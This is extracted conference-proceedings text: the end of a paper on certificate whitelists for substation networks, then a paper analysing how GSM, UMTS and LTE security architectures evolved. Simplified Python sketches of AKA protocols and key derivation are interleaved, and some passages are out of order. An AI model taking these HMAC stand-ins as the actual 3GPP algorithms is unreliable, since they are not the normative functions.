whitelists may be encoded efficiently by including matching criteria for the included certificates. As an alternative to the explicit enumeration of certificates, a filter can be included in a certificate whitelist that defines matching criteria for included certificates, i. e., that defines required properties of certificate fields. A Bloom filter [19] may be used, combined with a check for false matches. Bloom filters are a probabilistic data structure for membership queries that allow for an efficient encoding, but for which a false positive match may occur. As the set of all issued certificates is known in typical usage scenarios, checking for a false match is easily possible. Also, a PKI gateway can be deployed for secure interworking with external network domains using a standard public key infrastructure.
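A minimal sketch of this idea follows, assuming the compiler knows the complete set of issued certificates and can therefore rebuild the filter until no false match remains; sizes, hash count, and fingerprints are illustrative.

```python
import hashlib

class Bloom:
    """Minimal Bloom filter: k hash positions derived from SHA-256."""
    def __init__(self, m: int = 1024, k: int = 4):
        self.m, self.k, self.bits = m, k, 0

    def _positions(self, item: str):
        for i in range(self.k):
            h = hashlib.sha256(f"{i}:{item}".encode()).digest()
            yield int.from_bytes(h[:4], "big") % self.m

    def add(self, item: str):
        for p in self._positions(item):
            self.bits |= 1 << p

    def maybe_contains(self, item: str) -> bool:
        return all(self.bits >> p & 1 for p in self._positions(item))

def build_filter(whitelisted: set, all_issued: set, m: int = 1024) -> Bloom:
    """Because all issued certificates are known at compile time, false
    positives can be detected up front; enlarge the filter until none remain."""
    while True:
        bf = Bloom(m=m)
        for fp in whitelisted:
            bf.add(fp)
        if not any(bf.maybe_contains(fp) for fp in all_issued - whitelisted):
            return bf
        m *= 2  # a false match was found: retry with a larger filter

issued = {"fp-1", "fp-2", "fp-3"}     # all issued certificates (known up front)
bf = build_filter({"fp-1", "fp-2"}, issued)
print(bf.maybe_contains("fp-1"), bf.maybe_contains("fp-3"))  # True False
```

The compile-time rebuild loop is what turns the probabilistic filter into an exact encoding relative to the known certificate population.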
Also, the logical combination of multiple certificate
whitelists is possible in general. A combination of certificate whitelists may be advantageous, for instance, in an inter-substation communication scenario. Here, a first certificate whitelist may be provided for the substation-internal communication, and a second one for inter-substation communication. The final certificate whitelist for each purpose may
be defined by a logical combination of whitelists to ease the
certificate whitelist administration and the handling for the
field device. This might be done by logical OR, AND, or XOR
combinations of the certificate whitelists. This logical combination can be realized in different ways: The field devices
themselves can check against multiple certificate whitelists.
A logical expression is configured that defines the logical
combination of the certificate whitelists to be applied. As the
defined certificate whitelist structure shown in Fig. 2 allows
the encapsulation of multiple certificate whitelists within a
single data structure, an enhancement of this data structure
could indicate the logical combination of the whitelist entries
using the extension option. A further alternative would be
the preparation of device specific certificate whitelists by a
centralized infrastructure component that determines the result
of the logical combination of different certificate whitelists
before distributing the actual certificate whitelist to the end
points. This puts more effort on the centralized component,
but keeps the effort low for the field device. The assumption
here is that the certificate whitelist for a single endpoint is
rather short compared to substation wide certificate whitelists
containing all allowed (engineered) communication associations. The structure defined in Fig. 2 also allows the use of different matching criteria for a certificate. While the serial number and issuer or the certificate fingerprint are straightforward, the utilization of the public-key fingerprint provides another degree of freedom. This approach even allows certificates to be updated (assuming the public key stays the same) without changing the CWL. This decouples the certificate life cycle management from the access security policy management of certificates in automation environments.
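The set-logic combination discussed above can be sketched as follows; the fingerprints are illustrative, and a real deployment would combine the signed CWLs rather than bare sets.

```python
# Illustrative intra- and inter-substation whitelists (sets of fingerprints).
intra = {"fp-ied1", "fp-ied2", "fp-ctrl"}
inter = {"fp-ctrl", "fp-remote-ctrl"}

# OR: trusted for either purpose; AND: trusted for both purposes only.
effective_or = intra | inter
effective_and = intra & inter

print(sorted(effective_and))  # only the certificate on both lists
```

Computing such combinations centrally (as discussed above) keeps the per-device whitelist short, at the cost of more work in the backend.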
REFERENCES
[1] IEEE 802.11, "IEEE Standard for Information Technology–Telecommunications and Information Exchange Between Systems, Local and Metropolitan Area Networks–Specific Requirements Part 11: Wireless LAN Medium Access Control (MAC) and Physical Layer (PHY) Specifications." [Online]. Available: http://standards.ieee.org/about/get/802/802.11.html [accessed: 2014-09-01]
[2] R. Fielding, J. Gettys, J. Mogul, H. Frystyk, L. Masinter, P. Leach, and T. Berners-Lee, "Hypertext Transfer Protocol – HTTP/1.1," 1999, Internet Request for Comments RFC2616. [Online]. Available: https://tools.ietf.org/html/rfc2616 [accessed: 2014-09-01]
[3] IEEE 802.1X-2010, "IEEE Standard for Local and metropolitan area networks–Port-Based Network Access Control." [Online]. Available: http://standards.ieee.org/findstds/standard/802.1X-2010.html [accessed: 2014-09-01]
[4] C. Kaufman, P. Hoffman, Y. Nir, and P. Eronen, "Internet Key Exchange Protocol Version 2 (IKEv2)," Sep. 2010, Internet Request for Comments RFC5996. [Online]. Available: https://tools.ietf.org/html/rfc5996 [accessed: 2014-09-01]
[5] S. Kent and K. Seo, "Security Architecture for the Internet Protocol," Dec. 2005, Internet Request for Comments RFC4301. [Online]. Available: https://tools.ietf.org/html/rfc4301 [accessed: 2014-09-01]
[6] T. Ylonen and C. Lonvick, "The Secure Shell (SSH) Protocol Architecture," Jan. 2006, Internet Request for Comments RFC4251. [Online]. Available: https://tools.ietf.org/html/rfc4251 [accessed: 2014-09-01]
[7] Netscape, "SSL 3.0 specification," Nov. 1996. [Online]. Available: http://web.archive.org/web/20080208141212/http://wp.netscape.com/eng/ssl3/ [accessed: 2014-09-01]
[8] T. Dierks and E. Rescorla, "The Transport Layer Security (TLS) Protocol Version 1.2," Aug. 2008, Internet Request for Comments RFC5246. [Online]. Available: https://tools.ietf.org/html/rfc5246 [accessed: 2014-09-01]
[9] ITU-T X.509, "Information technology – Open Systems Interconnection – The Directory: Public-key and attribute certificate frameworks," 2012, version 3, corrigendum 3. [Online]. Available: http://www.itu.int/rec/T-REC-X.509-201210-S!Cor3/en [accessed: 2014-09-01]
[10] D. Cooper, S. Santesson, S. Farrell, S. Boeyen, R. Housley, and W. Polk, "Internet X.509 Public Key Infrastructure Certificate and Certificate Revocation List (CRL) Profile," May 2008, Internet Request for Comments RFC5280. [Online]. Available: https://tools.ietf.org/html/rfc5280 [accessed: 2014-09-01]
[11] J. Buchmann, E. Karatsiolis, and A. Wiesmaier, "Introduction to Public Key Infrastructures," Springer, 2013.
[12] S. Santesson, M. Myers, R. Ankney, A. Malpani, S. Galperin, and C. Adams, "X.509 Internet Public Key Infrastructure Online Certificate Status Protocol - OCSP," Jun. 2013, Internet Request for Comments RFC6960. [Online]. Available: https://tools.ietf.org/html/rfc6960 [accessed: 2014-09-01]
[13] eTutorials.org, "C/C++ Secure Programming – Chapter 10.9 Using a Whitelist to Verify Certificates," 2014. [Online]. Available: http://etutorials.org/Programming/secure+programming/ [accessed: 2014-09-01]
[14] Microsoft, "Digital Rights Management License Protocol – Retrieving Revocation Data from the Enrollment Server," 2014. [Online]. Available: http://msdn.microsoft.com/en-us/library/dd644914.aspx [accessed: 2014-09-01]
[15] ISO/IEC 62351, "Power systems management and associated information exchange – Data and communication security," 2014, IEC TC57. [Online]. Available: http://tc57.iec.ch/index-tc57.html [accessed: 2014-09-01]
[16] E. Rescorla, "HTTP Over TLS," 2000, Internet Request for Comments RFC2818. [Online]. Available: https://tools.ietf.org/html/rfc2818 [accessed: 2014-09-01]
[17] OPC Foundation, "OPC Unified Architecture Specification Part 1: Overview and Concepts, Release 1.02," Jul. 2012. [Online]. Available: http://www.opcfoundation.org/ua/ [accessed: 2014-09-01]
[18] ISO/IEC 61850, "IED Communications and Associated Data Models in Power Systems," 2014, IEC TC57. [Online]. Available: http://tc57.iec.ch/index-tc57.html [accessed: 2014-09-01]
[19] Wikipedia, "Bloom Filter." [Online]. Available: http://en.wikipedia.org/wiki/Bloom_filter [accessed: 2014-09-01]
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
172
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
Challenges for Evolving Large-Scale Security Architectures
Geir M. Køien
Institute of ICT
Faculty of Engineering and Science
University of Agder, Norway
Email: geir.koien@uia.no
Abstract—In this paper, we conduct an informal analysis of challenges that face evolving large-scale security architectures. The 3rd Generation Partnership Project (3GPP) mobile systems are our example case, and we investigate how these systems have evolved and how the security architecture has evolved with them. The 3GPP systems not only represent a truly long-lived system family, but also a massively successful one, serving billions of subscribers. What once was an auxiliary voice-based infrastructure has evolved into a main (and thereby critical) information and communications technology (ICT) infrastructure for billions of people. The 25+ years of system evolution have not been a linearly planned progression, and the overall system is now clearly also a product of its history. Our ultimate goal is to capture some of the essence of security architecture evolution for critical ICT systems.
Keywords–Evolving Security; System Security; Security Architecture; Long-term security planning.
I. INTRODUCTION
In this paper, we carry out a case-study analysis of some of
the challenges that evolving large-scale security architectures
must meet. The object of our study, the 3GPP systems, has
gradually become important, all-encompassing and pervasive
on a global scale. The systems have emerged to become a
critical ICT infrastructure and this makes the system robustness
and security a concern for society-at-large.
A. The 3GPP System Context
The first 3GPP system is the second generation (2G)
Global System for Mobile communications (GSM), developed
in the mid/late 1980s. Originally, GSM only featured circuit-switched (CS) services, but was later adapted to also include
packet-switched (PS) services through the General Packet
Radio Service (GPRS) extension. With the new millennium
came the third generation (3G) Universal Mobile Telecommunications System (UMTS), which natively features both CS
and PS services. From around 2010 we also have the fourth
generation (4G) Long-Term Evolution (LTE) system, which is
a broadband PS-only system. LTE is further developed into
LTE-Advanced (LTE-A).
1) Principal Parties: From a subscriber perspective, the
system can be described with three types of principal parties.
• The Home Public Land Mobile Network (HPLMN)
• The Visited Public Land Mobile Network (VPLMN)
• The subscriber/user (USER)
These parties are legal entities, and the relationships are
determined by contractual agreements. A national telecom
regulator will also be involved, in addition to external service
providers. One may also add intruders to the list. The external service providers usually have little influence on how the networks operate, and so we exclude them from further discussion. Likewise, in this context, we do not see a need to include mobile virtual network operators (MVNOs).
2) System Development: The 3GPP system specifications
are developed by the 3GPP, but ratification is done by the
organizational partners (formal standardization bodies). As
with other such groups, the 3GPP is contribution driven. This
has an important impact on what is actually being done.
The impact is noticeable when it comes to priorities and
efforts spent. Early on, when GSM/GPRS was specified, the
operators took considerable responsibility and led many of the
efforts. Subsequently, the vendors have taken over more and
more of this work. The impetus to carry out work is clearly
related to the business potential the work has. Unfortunately,
investments in security functions seldom look like a good
business proposition prior to an incident.
The 3GPP differentiates between mandatory for implementation and mandatory for use. That is, a feature may be mandatory for vendors to implement if they want compliance with a given system release, while the operators may freely disregard the feature if they want. Other functions may be mandatory both to implement and to deploy.
3) License to Operation and Regulatory Requirements:
Cellular systems operate in licensed bands and are subject to
regulatory requirements. These requirements include support
for lawful interception (LI) and emergency call (EC). Over the last decade we have also had anti-terrorist measures such as the EU Data Retention Directive (DRD) [1].
B. Brief Introduction to 3GPP Systems
1) 2G – GSM and GPRS: The GSM and GPRS systems
are the 2G systems. It is common to see monikers like 2.5G
used for GPRS, and 2.9G used for GPRS with Enhanced
Data rates for Global Evolution (EDGE). The main GSM
features are mobility, speech and text messaging. GPRS is
an overlay system to GSM. It features two additional core
network nodes and provides PS support. With EDGE (new modulation and coding schemes) it provides data rates of up to 236 kbps. There is also an
“Evolved EDGE” extension on the horizon, with yet higher
data-rates. The 2G-based radio access network is called GSM
EDGE Radio Access Network (GERAN).
2) 3G – UMTS (incl. High-Speed Packet Access (HSPA)): The UMTS system was finalized in late 1999 and is a combined CS/PS system. It can readily achieve data rates >10 Mbps (with maximum downlink rates >100 Mbps). The system is a mix
of GSM/GPRS technology and protocols and, increasingly,
IP-based protocols and technology. The radio access network
is called the Universal Terrestrial Radio Access Network
(UTRAN).
3) 4G – LTE and LTE-A: The LTE systems are designed as all-IP networks (AIPN) and feature true mobile broadband.
The core network is fully IP based and there are no CS
components to be found. The radio system is highly advanced
and provides true broadband services. The radio base-stations,
called eNB, are logically mesh connected. There are no
longer any controllers in the access network (E-UTRAN). The
VPLMN mobility functions are carried out by the mobility
management entity (MME) server.
C. Paper Layout
In Section II, we briefly outline the security of the 3GPP
systems. In Section III, we attempt to capture some of the triggers for changing the security architecture. Then we proceed
in Section IV, with observations regarding successful systems,
and for security and cryptography in those systems. We also
include observations regarding the typical intruders. In Section
V, we try to learn from the lessons and provide some advice.
Finally, we sum up our effort and provide some concluding
remarks in Section VI.
crypto). The SIM also contains the security credentials, like the
permanent subscriber identity (IMSI) and the corresponding
128-bit authentication secret, called KI in the 2G SIM. Figure
1 outlines the GSM security procedures.
The AKA protocol used is called GSM AKA, and it is a
single-pass challenge-response protocol with a signed response
(SRES). The challenge is a pseudo-random 128-bit RAND
bit-field and the response is the 32-bit SRES element. The
challenge-response part is dependent on an “authentication set”
forwarding stage, in which the HPLMN forwards the authentication credentials to the VPLMN network. The protocol is
run between the SIM and the visited network. This scheme
is efficient and allows for fast and simple authentication of the subscriber as well as deriving a session key (the 64-bit KC). The SIM features the A3 and A8 AKA interfaces, which are only found in the SIM and the home subscriber database (HLR). The original example implementation, called COMP128, is cryptographically broken [3], but still seems to be in use in many markets.
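The challenge-response exchange described above can be sketched as follows. The A3/A8 functions are operator-chosen and proprietary; the HMAC-based stand-in below is purely illustrative (as noted, the COMP128 example implementation is broken and should not be reimplemented):

```python
import hmac, hashlib, os

KEY_KI = os.urandom(16)  # 128-bit subscriber secret KI, shared by SIM and HLR/AuC

def a3_a8(ki: bytes, rand: bytes):
    """Illustrative stand-in for the A3/A8 interfaces: derive SRES and Kc."""
    digest = hmac.new(ki, rand, hashlib.sha256).digest()
    sres = digest[:4]      # 32-bit signed response (A3)
    kc = digest[4:12]      # 64-bit session key Kc (A8)
    return sres, kc

# HPLMN/AuC precomputes an authentication set and forwards it to the VPLMN.
rand = os.urandom(16)                  # 128-bit pseudo-random challenge
sres_expected, kc = a3_a8(KEY_KI, rand)

# The VPLMN challenges the SIM; the SIM computes its response locally.
sres_sim, kc_sim = a3_a8(KEY_KI, rand)

assert sres_sim == sres_expected       # subscriber authenticated
assert kc_sim == kc                    # both sides now hold the session key Kc
```

Note that the SIM never verifies anything about the network, which is the one-way authentication weakness listed below.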
(Figure 1 message flow, between MS/SIM, BTS/BSC, VLR/MSC and HLR/AuC: Provide Identity (IMSI); SEND_AUTH_INFO(IMSI)/-ack(AuthSet); AUTHENTICATION_REQUEST(RAND); AUTHENTICATION_RESPONSE(SRES); CIPHER_MODE_COMMAND/COMPLETE. Confidentiality protection covers only the MS–BTS link.)
II. SECURITY IN THE 3GPP SYSTEMS
In this Section, we provide a (necessarily) short description of the main features of the 3GPP security provisions.
Figure 1: GSM security overview
A. 2G Security
There is no well-defined security architecture per se in
the 2G systems. The main security specification was technical
specification (TS) 03.20 “Security-related network functions”,
which subsequently has been transposed into TS 43.020 [2].
It defines the identity- and location privacy scheme, the entity authentication protocol and the smart-card based security
functions. It also outlines the over-the-air cipher function.
1) Background and Requirements: In the voice-only 1G
systems one had experienced charging fraud and impersonation
fraud. Two distinct types of attacks quickly came into focus:
a) Eavesdropping was a big problem as the analogue voice
channel was unprotected and easy to listen-in on. b) Faking
the call setup signaling, which was digital, was quite easy
and could in principle be done by simply recording a setup sequence and then later replaying it. The main priority for a fully digital system à la GSM was therefore to a) protect the over-the-air channel against eavesdropping, such that it would no
longer be the weakest link, and b) provide credible subscriber
authentication to avoid impersonation attacks.
2) The 2G Security Architecture: GSM security is based
on a physical subscriber identity module (SIM). For portability
reasons it was decided to use a smart-card. The SIM comprises
both hardware and software functionality, and it contains the
authentication and key agreement (AKA) functions (symmetric
Over-the-air encryption is by means of the A5 stream cipher family, which is located in the mobile phone and the base transceiver station (BTS). There are several A5 versions available, but the original A5/1 is still the default and mandatory-to-deploy algorithm. It can easily be broken today by a dedicated attacker [4]. The A5/2 algorithm, which was explicitly designed to be weak (CoCom regulations), is officially deprecated. The A5/3 algorithm, which is based on the 3G KASUMI design, is the current best option for GSM, but rainbow table attacks still work since the algorithm is limited to a 64-bit key [5]. The A5 family is based around a 64-bit key, except the new (and not deployed) A5/4 cipher, which is a 128-bit design based on the KASUMI algorithm. In GPRS one uses the GSM AKA protocol as-is, but with the GPRS Encryption Algorithm (GEA) ciphers to protect the asynchronous packet transfers.
3) Omissions and Shortcomings: There are many obvious
omissions and shortcomings to GSM security. This is not
strange as the 2G systems do not have a security architecture as such; it is more akin to a collection of measures put together without well-defined requirements. The following list (derived
in [6]) identifies some of the flaws. Even with all these flaws,
the GSM/GPRS system has been a remarkably secure system.
However, some 25 years down the line, the shortcomings have become serious liabilities. There are also a number of implementation issues [7]. The list is not fair with regard to the threats found early on, but it is certainly valid now.
• One-way authentication is utterly inadequate
• Delegated authentication is naive trust-wise
• No inter-operator authentication
• No way to authenticate system nodes
• No uniqueness/freshness to challenges
• Unauthenticated plain-text transfer of security credentials
• Unprotected key transfer
• Missing key binding and too short keys
• Key refresh dependent on re-authentication
• Missing expiry condition on security context
• Weak A3/A8 functions and no key-deriving key structure
• Short A5 key stream cycle and key stream re-use
• Redundant and structured input to A5 (expand-then-encrypt)
• Highly redundant input to A5 (in signaling messages)
• Protection coverage/range too short (only MS – BTS)
• Missing integrity protection
• Weak/inadequate identity/location privacy
• No core network control plane (signaling) security features
• No core network user plane protection
• No IP protection (GPRS)
• No mobile phone (MS) platform security
B. 3G Security
1) Background and Requirements: Security in the UMTS
system is described briefly in [6, 8] and in considerable depth
in [9]. The main security specification is TS 33.102 [10].
One also provided a “Security Objectives and Principles”
[11] background document, as well as conducting a threats
and requirements analysis [12]. One also introduced Network
Domain Security (NDS), which includes IPsec profiles for
use with 3GPP systems [13] and a standard set of public-key
infrastructure (PKI) protocols and methods [14].
2) The 3G Security Architecture: The UMTS security architecture, depicted in Figure 2, is an important overhaul of
the GSM security, yet the underlying system model remains
much the same. Amongst the features are:
• New subscriber card (UICC) with security module (USIM)
• Introduction of 128-bit crypto primitives
• Improved two-way AKA algorithm (UMTS AKA)
• Introduction of core network protection (IP protocols)
Sadly, backwards compatibility concerns also dictated that
the GSM SIM could still be used, which re-introduces many
if not most of the 2G weaknesses.
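The two-way UMTS AKA exchange (Figure 2) can be sketched as follows. The real f1–f5 functions are typically MILENAGE (AES-based); the HMAC stand-ins and the simplified AUTN encoding (no anonymity key or AMF) are assumptions for illustration only:

```python
import hmac, hashlib, os

K = os.urandom(16)   # long-term secret shared by USIM and HLR/AuC
SQN_HE = 42          # home-environment sequence number (challenge freshness)

def f(key: bytes, label: bytes, *parts: bytes) -> bytes:
    """Generic stand-in for the f1..f5 key/response functions."""
    return hmac.new(key, label + b"".join(parts), hashlib.sha256).digest()

def make_av(k: bytes, sqn: int):
    """AuC side: build a (simplified) authentication vector AV."""
    rand = os.urandom(16)
    sqn_b = sqn.to_bytes(6, "big")
    mac = f(k, b"f1", sqn_b, rand)[:8]    # network authentication code
    xres = f(k, b"f2", rand)[:8]          # expected subscriber response
    ck = f(k, b"f3", rand)[:16]           # cipher key
    ik = f(k, b"f4", rand)[:16]           # integrity key
    autn = sqn_b + mac                    # simplified AUTN token
    return rand, autn, xres, ck, ik

def usim_response(k: bytes, rand: bytes, autn: bytes, sqn_ms: int) -> bytes:
    """USIM side: authenticate the network before answering."""
    sqn_b, mac = autn[:6], autn[6:]
    if not hmac.compare_digest(mac, f(k, b"f1", sqn_b, rand)[:8]):
        raise ValueError("network authentication failed")
    if int.from_bytes(sqn_b, "big") <= sqn_ms:
        raise ValueError("stale challenge (replay)")
    return f(k, b"f2", rand)[:8]          # RES

rand, autn, xres, ck, ik = make_av(K, SQN_HE)
res = usim_response(K, rand, autn, sqn_ms=41)
assert hmac.compare_digest(res, xres)     # subscriber authenticated
```

The MAC and sequence-number check are what a 2G SIM cannot do, which is why SIM-based access re-introduces the one-way authentication and replay weaknesses.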
3) The IP Multimedia Subsystem (IMS): IMS came with
UMTS (Rel.5). We do not include IMS in our discussions as
it is an optional service-level feature.
(Figure 2 message flow: MAP_SendAuthInfo(IMSI)/-ack(AV); Challenge(RAND,AUTN); Response(RES); key transport of (CK, IK) to the serving network. Confidentiality and integrity protection covers the UE–RNC link.)
Figure 2: UMTS security
4) Omissions and Shortcomings: The 3G security is substantially better and more future-proof than the 2G security, and one really has a security architecture. The architecture is by no means perfect or complete, but it does at least capture the main risks/threats and defines what one wants to protect. Completeness will always be an issue, but in the 3G systems there is also sometimes a considerable mismatch between the stated goals and what the mechanisms achieve. A case in point would be the identity/location privacy requirements, which do capture the problem well, but the mechanisms that should provide the necessary services are woefully inadequate. They are, however, a) exactly the same as for the 2G systems and b) intimately tied to the identity presentation scheme defined in the basic mobility management (MM) protocol machinery (discussed in [6, 15]).
Making changes here would have been a major undertaking,
and since there was considerable time pressure to complete the
3G standard, improvements to identity/location privacy simply
did not happen (there were efforts investigating the possibilities
during the Rel.99 design).
Many of the items on the 2G list of omissions and
shortcomings are mitigated and resolved, but suffice to say
that many of the 2G weaknesses were inherited or permitted
through backwards compatibility requirements. Another main
problem with 3G security is the limited scope.
C. 4G Security
1) Background and Requirements: The book “LTE Security” [16] is a good and thorough introduction. The main security
standard for LTE is TS 33.401 [17]. LTE and LTE-A are very
similar with respect to the security architecture, which for
historical reasons is called the “System Architecture Evolution
(SAE)” security architecture. The term Evolved Packet System
(EPS) is also used.
The radio access architecture changed significantly with
LTE and this triggered large-scale changes to the whole
system, including the security architecture. The security requirements were retained more or less as-is. For compatibility
reasons and due to time constraints during the design phase,
the UMTS AKA protocol was retained as a component of the
EPS AKA protocol.
2) The 4G Security Architecture: The LTE security architecture has a lot in common with 3G security, but with some
important changes. Amongst the LTE features are:
• UICC/USIM is retained and required
• Introduction of full key-deriving key hierarchy
• Session keys not dependent on re-authentication
• Auth. master key (KASME) bound to VPLMN id.
• New session keys for every handover
• Separation of user plane and control plane protection
• Introduction of improved AKA algorithm (EPS AKA)
the mobile devices must have a minimal level of protection.
This is not only to protect the user, which a HPLMN should
be interested in anyhow, but also to protect the network as
a population of broadband devices could disrupt the access
network. Distributed Denial-of-Service (DDoS) attacks would
be but one possibility.
D. Architectural Oddities
A welcome change is that backwards compatibility with
GSM SIM is prohibited for access to E-UTRAN. UMTS
AKA derived security contexts can be used (mapped) to LTE
contexts. Figure 3 depicts the EPS key hierarchy, which is very
different from the 2G/3G schemes. The new key derivations
take place exclusively outside the UICC/USIM. This makes
for a significant departure from previous practices.
Figure 3: The EPS key hierarchy (the permanent subscriber secret K, held by the UICC/USIM and HSS, yields CK, IK via the “UMTS AKA” part; from these the ME and HSS derive KASME; from KASME the ME and MME derive KNASint and KNASenc; the ME and eNodeB derive KeNB, and from it KRRCint, KRRCenc and KUPenc).
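The derivation chain of Figure 3 can be sketched as follows. The generic 3GPP KDF (TS 33.220) is indeed HMAC-SHA-256, but the labels, parameter encodings, and the handover step below are simplified placeholders rather than the normative FC-byte encodings of TS 33.401:

```python
import hmac, hashlib, os

def kdf(key: bytes, *params: bytes) -> bytes:
    """HMAC-SHA-256 KDF in the style of 3GPP TS 33.220 (simplified: the
    normative version encodes an FC byte plus length-prefixed parameters)."""
    return hmac.new(key, b"".join(params), hashlib.sha256).digest()

# The "UMTS AKA" part (inside the UICC/USIM and HSS) yields CK, IK.
ck, ik = os.urandom(16), os.urandom(16)

# All further derivations take place outside the UICC/USIM:
plmn_id = b"\x24\x20\x01"                       # illustrative serving-network id
k_asme = kdf(ck + ik, b"ASME", plmn_id)         # bound to the VPLMN identity
k_enb = kdf(k_asme, b"eNB", (0).to_bytes(4, "big"))  # bound to an uplink count
k_nas_int = kdf(k_asme, b"NAS-int")             # NAS signaling integrity
k_nas_enc = kdf(k_asme, b"NAS-enc")             # NAS signaling encryption
k_rrc_int = kdf(k_enb, b"RRC-int")              # radio control plane integrity
k_rrc_enc = kdf(k_enb, b"RRC-enc")              # radio control plane encryption
k_up_enc = kdf(k_enb, b"UP-enc")                # user plane encryption

# A handover re-derives KeNB, so the next cell never sees the old keys.
k_enb_next = kdf(k_enb, b"NH")
assert k_enb_next != k_enb
```

The separation of user plane and control plane keys, and the per-handover re-derivation, are the listed LTE features; binding KASME to the PLMN identity is what ties the key to the serving network.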
3) Omissions and Shortcomings: The list of omissions and shortcomings is shorter for LTE, but there are also new threats.
In a world of smart phones, it is obvious that 128-bit crypto
on the access link may count for nothing if the mobile phone
is infested with malicious Apps. Likewise, the networks are
often hybrid systems, and it is common to have base stations
that are 2G/3G/4G compliant. With different security levels
and common hardware/software, it is clear that strong 4G
protection may easily be offset with weak 2G/3G protection.
For 4G this is quite important, as the mesh architecture means
that all eNBs will be able to reach all other eNBs. Thus, one
compromised eNB can reach all other eNBs in the network
segment (which may span the entire operator network). It
is also clear that many of the nodes, including the base
station (BTS/NB/eNB) may be running commodity operating
systems (OS). The chosen OS, likely a Linux variant, may
be reasonably secure, but even a high-security OS will have
weaknesses and must be properly managed to remain secure.
Also, introduction of firewalls and intrusion detection systems
will be required for these systems now. Server hardening is
a must, and even so it is clear that not all attacks can be
prevented. This means that prevention alone cannot be a viable
future strategy.
The EPS security architecture does require the eNB to be
secure, but the specification is not very specific [17]. It also
has recommendations on use of firewalls, but the specification
is quite vague on this subject too. For a greenfield 4G system,
the security may be quite good at what the system provides,
but the standard system does not do all it needs to do.
Also, it is obvious that even though the user equipment (UE)
normally is not owned or controlled by the network operator,
One puzzling aspect of the 3GPP security architectures is that while identity presentation and entity authentication are fully standardized, there are no authorization mechanisms present. There are of course mechanisms to discriminate between subscribers based on the type of subscription, but these schemes are not a feature of the security architecture.
Another aspect to be noted is that the subscriber identity
that actually is authenticated, the IMSI, is basically a link layer
identifier. Since there is only basic connectivity present at the link layer, this may help explain why there never was any built-in authorization scheme in the 3GPP security architecture.
III. EVOLVING SECURITY ARCHITECTURE
A. Why Change the Security Architecture?
The short answer is that we need to change the security
architecture because some of the premises for the original
security architecture have changed. A slightly longer answer
would revolve around the following aspects.
B. High-level change triggers
There are many high-level change triggers, amongst others:
• Changes to the assets of the system: This could include changes to the value of the existing assets, inclusion of new assets, or removal of assets.
• Changes in the threats towards the assets: This includes asset exposure, new intruders, and new intruder capabilities. For new assets it could also include missing or mismatched protection.
• Changes to the system context: The system may initially have played a limited role, but may have evolved into something more.
C. Evolution aspects
Large-scale long-lived systems cannot remain as static
objects for long. Instead, they must be dynamic and adapt to
changing environments.
• Evolving Target System: If the target system changes, then this will likely affect the security architecture. Still, the nature of the change may be such that it does not trigger a need for updating the security architecture.
• Evolving Security Architecture - Externally triggered: The security architecture may need updates and modifications due to external circumstances, or even completion of planned features that were not initially fully specified. Changes in the threats towards the assets, the exposure of the assets, and the number of users will also affect the system. It could also involve changing trust relationships and changes to the value of the assets.
• Evolving Security Architecture - Internally triggered: The internal circumstances would encompass altered or increased use, which would include changes to the assets of the system.
• Security Evolution History: An evolving system is obviously a product of its history. Decisions taken during the design of GSM still have an impact on LTE. For instance, the basic identity presentation scheme essentially remains the same for LTE as for GSM [18, 19].
• Societal Impact: When a system reaches certain thresholds it will take on a new role. It enters a state of criticality to society and will become an object of regulatory interest. The critical infrastructure (CI) requirements will focus on system survival and service availability rather than security and privacy for the individual.
• Privacy: Privacy requirements may not have mattered too much for a small system with few users back in the early 1990s. Today, privacy requirements are often mandated by laws and regulations.
IV. ASSUMPTIONS REGARDING SYSTEMS, SECURITY AND CRYPTOGRAPHIC CHARACTERISTICS
The following set of assumptions may not all be true for all systems, but we advocate assuming that they are true.
A. Assumptions about Successful Systems
We assume that when people start to design a system they intend it to be successful. Thus, they must take the above into account in their design. Our high-level assumptions about a successful system:
1) It will outlive its intended lifetime (and design)
2) It will have many more users than originally intended
3) It will need to scale its services cost-effectively
4) It will become highly valuable (many/valuable assets)
5) It will outlive its base technologies
6) It may become a critical system (company, organization)
7) It may become a critical infrastructure (society-at-large)
8) It will spawn unsuccessful branches/features
9) It will have to deal with multi-vendor cases
10) It will need to operate with multiple releases in place
11) It must encompass all of operations & maintenance too
12) It will be subject to regulatory interventions
B. Assumptions about System Security
Our assumptions about a long-lived security architecture:
1) The assets will change (value/number/types)
2) The principal parties will change and multiply
3) The threats will change
4) Trust models will fail (and/or become outdated)
5) Trust will be betrayed
6) Risk evaluations will be outdated
7) The weaknesses, vulnerabilities and exposure will change
8) The intruders will become more powerful and proliferate
9) Attacks will only get better over time
10) There will be security incidents
11) Scalability in security mechanisms will be decisive
12) No single security scheme or approach will be sufficient
13) Effective and efficient defense-in-depth will be needed
14) Pro-active security protection will not be sufficient
15) Re-active security will be very important (detect & respond)
16) Ability to handle large incidents will be required
17) Mitigation and recovery must be supported
18) Pervasive resilience and robustness is required
19) Autonomous sub-system response will become important
20) There will be security architecture omissions
21) There will be security compatibility issues (multi-vendor)
22) There will be security compatibility issues (multi-release)
23) Fixing minor security holes can take a very long time
24) Fixing the security architecture takes years (next generation)
25) Security management will be crucial
26) Security configuration management is crucial
27) Security migration methods should be built-in
28) Privacy will become ever more important
C. Assumptions about Cryptographic Solutions
Our assumptions related to cryptographic solutions:
1) The cryptographic base functions must be future-proof
2) Cryptographic primitives will be broken (or too weak)
3) Key sizes will be changed
4) Security protocols will be broken (or too weak)
5) Cryptographic parameters will need to be negotiated (securely)
6) Cryptographic primitives will need to be revoked
7) Implementations will contain weaknesses
8) Management of cryptographic elements will be crucial
It is clear that the basic bootstrapping foundation must be very solid. This minimal base is what you will depend on if you need to bootstrap new security solutions and new cryptographic primitives in the rest of the security architecture. It needs to contain enough to support bootstrapping and it needs to be future-proof. Efficiency is not a main priority here.
D. The Scalability War
The classical Dolev-Yao Intruder (DYI) is not the most realistic intruder [20]. Real intruders will use any available means (subversion, physical intrusion, tricking the principals), ultimately being as powerful as a DYI. There is a reasonable body of papers detailing various intruder models, but suffice it to say that a modern CI system must be able to handle all types of intruders. And many of them! This essentially means that the system must have efficient as well as effective protection, and that mechanisms that do not scale well, compared to intruder capabilities, will be doomed to fail in the long run.
Our assumptions related to scalability and efficiency:
1) Security scalability will be a major concern
2) Efficiency is highly important
3) Effectiveness is imperative for core mechanisms
4) Auxiliary defense-in-depth solutions are needed
5) Avoid specific-attack measures if at all possible
6) Security management must scale well
